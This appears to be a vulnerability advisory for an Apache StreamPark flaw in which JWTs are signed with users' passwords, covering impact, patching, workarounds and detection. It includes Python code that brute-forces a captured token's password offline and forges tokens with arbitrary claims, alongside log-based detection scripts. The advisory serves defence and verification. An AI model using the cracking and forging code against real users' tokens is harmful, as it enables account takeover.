CVE-2025-53960
📋 TL;DR
Apache StreamPark versions 2.0.0 through 2.1.6 use each user's password as the key that signs that user's JWT. Anyone who captures a token (from network traffic, a URL, a proxy or application log, or a browser) can brute-force the password offline without sending a single request to the server, and anyone who knows a password can mint tokens with arbitrary claims for that account. The result is complete account takeover for the affected user. All deployments on vulnerable versions are at risk; the fix is to upgrade to 2.1.7.
💻 Affected Systems
- Apache StreamPark
📦 What is this software?
Apache StreamPark is an open-source platform for developing, deploying and managing Apache Flink and Spark streaming jobs. Its web console authenticates users and issues JWTs that the browser and REST clients present on later requests, which is where this flaw lives.
⚠️ Risk & Real-World Impact
Worst Case
An attacker recovers (or already knows) the password of a privileged account, forges tokens for it, and impersonates that user to read sensitive data, reconfigure jobs, and perform any other action the account is allowed. Repeated against every user whose token the attacker observes, this is takeover of all accounts in the deployment.
Likely Case
Targeted compromise: the attacker captures JWTs from network traffic, proxy or application logs, or URLs, runs an offline dictionary attack against each token's signature, and logs in as any user whose password is weak. The cracking phase never touches the server, so it produces no failed-login events to alert on.
If Mitigated
Strong password policies and TLS-only token transport raise the cost of the offline attack but do not remove it: the signature still depends on the password, so a cracked, guessed, or leaked password still yields valid tokens until the signing key is made independent of user credentials.
🎯 Exploit Status
Exploitation requires capturing a JWT first, which means some level of network, log, or client-side access. Once a token is in hand, the remaining steps (cracking the password, forging tokens) run entirely offline and leave no trace on the StreamPark host.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.1.7
Vendor Advisory: https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy
Restart Required: Yes
Instructions:
1. Download Apache StreamPark 2.1.7 from official sources.
2. Stop the current StreamPark service.
3. Replace the installation with the patched version.
4. Restart the service.
5. Verify that JWT signing now uses a secure key that is independent of user passwords.
🔧 Temporary Workarounds
Disable JWT Authentication
Temporarily disable JWT-based authentication and use an alternative authentication method, if your deployment has one available. Confirm that the console and its REST API remain usable without JWTs before relying on this.
Modify the application configuration to remove or comment out the JWT authentication settings.
Front StreamPark with an Authenticating Proxy
Put StreamPark behind an API gateway or reverse proxy that enforces its own authentication layer (SSO, mTLS, or a token the proxy signs with a key it controls), so that a captured StreamPark JWT alone is not enough to reach the service. Note that the proxy cannot validate StreamPark's own tokens with proper key management, because each token's signing key is the user's password.
Configure nginx, Apache httpd, or Traefik to authenticate requests before forwarding them to StreamPark.
🧯 If You Can't Patch
- Enforce strong password policies (minimum 16 characters, complexity requirements) and rotate existing passwords. The attack is offline, so only password entropy limits it, and a password already cracked from an old token stays valid until it is changed.
- Keep tokens off the wire in the clear and out of logs: require TLS, never place tokens in URLs, and scrub Authorization headers from proxy and application logs. Segment the network and monitor for the same token being presented from unexpected source addresses.
🔍 How to Verify
Check if Vulnerable:
Log in as a test account, take the JWT it is issued, and recompute the HMAC over the token's `header.payload` portion using that account's password as the key. If the result matches the token's signature, tokens are signed with user passwords and the deployment is vulnerable. Alternatively, review the application source for the key selection in the JWT signing logic.
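The block below is an added example written for this page; it is not StreamPark's code. It illustrates both the offline attack described under Likely Case and the signature check above. It assumes HS256 with the raw password bytes as the HMAC key; the exact algorithm and key derivation in the affected versions are not stated on this page and must be confirmed against the source. The password, wordlist, and claims are constructed test data.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Minimal HS256 JWT helpers for the demonstration. ASSUMPTION: the vulnerable
# versions sign with HS256 using the user's password bytes as the key.


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_jwt(claims: dict, key: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt(token: str, key: bytes) -> bool:
    header, payload, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def signed_with_password(token: str, password: str) -> bool:
    """Vulnerability check: does a captured token verify under the account's password?"""
    return verify_jwt(token, password.encode())


def brute_force_password(token: str, wordlist) -> Optional[str]:
    """Offline attack: needs only the captured token and a wordlist, no server contact."""
    for candidate in wordlist:
        if verify_jwt(token, candidate.encode()):
            return candidate
    return None


def forge_token(password: str, claims: dict) -> str:
    """Once the password is known, tokens with arbitrary claims can be minted."""
    return sign_jwt(claims, password.encode())


# Constructed demo data (not real credentials).
USER_PASSWORD = "Winter2024!"
WORDLIST = ["password", "admin123", "Summer2023!", "Winter2024!", "letmein"]
CLAIMS = {"sub": "alice", "exp": 1_800_000_000}


def demo() -> dict:
    # Vulnerable pattern: token keyed on the user's password.
    vulnerable_token = sign_jwt(CLAIMS, USER_PASSWORD.encode())
    recovered = brute_force_password(vulnerable_token, WORDLIST)
    forged = forge_token(recovered, {"sub": "alice", "exp": 4_102_444_800}) if recovered else None

    # Fixed pattern: a random server-side key that no password can reproduce.
    server_key = secrets.token_bytes(32)
    fixed_token = sign_jwt(CLAIMS, server_key)

    return {
        "vulnerable": signed_with_password(vulnerable_token, USER_PASSWORD),
        "recovered": recovered,
        "forged_accepted": bool(forged) and verify_jwt(forged, USER_PASSWORD.encode()),
        "fixed_not_password_signed": not signed_with_password(fixed_token, USER_PASSWORD),
        "fixed_brute_force": brute_force_password(fixed_token, WORDLIST),
    }


if __name__ == "__main__":
    print(demo())
```

Run `signed_with_password(token, password)` against a token from your own test account to perform the check; a `True` result means the deployment is vulnerable, and the same loop in `brute_force_password` is exactly what an attacker runs at hashcat speeds once a token leaks.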
Check Version:
Check the StreamPark version shown in the web console or in the installed release package name, or run: java -jar streampark-web.jar --version (if your build supports it). Any version from 2.0.0 through 2.1.6 is affected.
Verify Fix Applied:
After upgrading, repeat the signature check: a freshly issued token must no longer verify under the user's password. The signing key should be a server-side secret independent of any user credential. Because the key changes, tokens issued before the upgrade will no longer validate, so users must log in again.
📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts followed by a successful login, or successful logins from new or unusual source addresses. The offline cracking phase itself generates no server-side events; only the resulting logins are visible.
- JWTs appearing in URLs, proxy access logs, or application logs (each one is crackable offline).
Network Indicators:
- The same JWT presented from more than one source address, or from an address that never performed a login (a replayed or forged token).
SIEM Query:
source="streampark" AND (event_type="authentication" AND result="success") | stats count by user, src_ip | where count > threshold
(Set threshold from your environment's baseline, and compare each src_ip against the addresses the user normally logs in from.)
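An added example, not part of the original page or the StreamPark project, that turns the indicators above into detection logic over constructed log lines. The JSON field names (ts, event, result, user, src_ip, token) are assumptions; map them to your own StreamPark or proxy log schema. Tokens are fingerprinted with SHA-256 so the raw JWT never lands in the SIEM.

```python
import hashlib
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (JSON, one event per line). Field names are an assumption
# for this example, not StreamPark's real log format. The "token" field stands for
# a JWT observed on an API request, e.g. by a logging reverse proxy.
SAMPLE_LOG = """\
{"ts":"2025-07-01T08:00:00Z","event":"login","result":"failure","user":"alice","src_ip":"203.0.113.7"}
{"ts":"2025-07-01T08:00:04Z","event":"login","result":"failure","user":"alice","src_ip":"203.0.113.7"}
{"ts":"2025-07-01T08:00:09Z","event":"login","result":"failure","user":"alice","src_ip":"203.0.113.7"}
{"ts":"2025-07-01T08:00:15Z","event":"login","result":"success","user":"alice","src_ip":"203.0.113.7"}
{"ts":"2025-07-01T09:00:00Z","event":"login","result":"success","user":"bob","src_ip":"10.0.0.12"}
{"ts":"2025-07-01T09:05:00Z","event":"api","result":"success","user":"bob","src_ip":"10.0.0.12","token":"eyJhbGciOi.AAA.BBB"}
{"ts":"2025-07-01T09:07:00Z","event":"api","result":"success","user":"bob","src_ip":"198.51.100.9","token":"eyJhbGciOi.AAA.BBB"}
"""


def parse_log(text: str) -> list:
    """Parse JSON lines into events sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_bruteforce_then_success(events, threshold: int = 3, window=timedelta(minutes=5)) -> list:
    """Alert when a user's successful login follows >= threshold failures within the window.

    Only online guessing shows up here; offline cracking of a captured token produces
    no failures at all, so pair this with detect_token_reuse."""
    recent_failures = defaultdict(list)
    alerts = []
    for e in events:
        if e["event"] != "login":
            continue
        user = e["user"]
        if e["result"] == "failure":
            recent_failures[user].append(e["ts"])
            continue
        cutoff = e["ts"] - window
        fails = [t for t in recent_failures[user] if t >= cutoff]
        if len(fails) >= threshold:
            alerts.append({"user": user, "src_ip": e["src_ip"],
                           "ts": e["ts"].isoformat(), "failures": len(fails)})
        recent_failures[user].clear()
    return alerts


def detect_token_reuse(events) -> list:
    """Alert when one JWT (by fingerprint) is presented from more than one source IP."""
    ips_by_token = defaultdict(set)
    user_by_token = {}
    for e in events:
        tok = e.get("token")
        if not tok:
            continue
        fp = hashlib.sha256(tok.encode()).hexdigest()[:16]  # never store the raw token
        ips_by_token[fp].add(e["src_ip"])
        user_by_token[fp] = e["user"]
    return [{"user": user_by_token[fp], "token_fp": fp, "src_ips": sorted(ips)}
            for fp, ips in ips_by_token.items() if len(ips) > 1]


def analyze(text: str) -> dict:
    events = parse_log(text)
    return {"bruteforce": detect_bruteforce_then_success(events),
            "token_reuse": detect_token_reuse(events)}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOG), indent=2))
```

On the sample, alice's login is flagged for three failures in the preceding five minutes, and bob's token is flagged because the same JWT appears from 10.0.0.12 and 198.51.100.9; a token seen from an address that never logged in is the strongest single signal that a captured or forged token is in use.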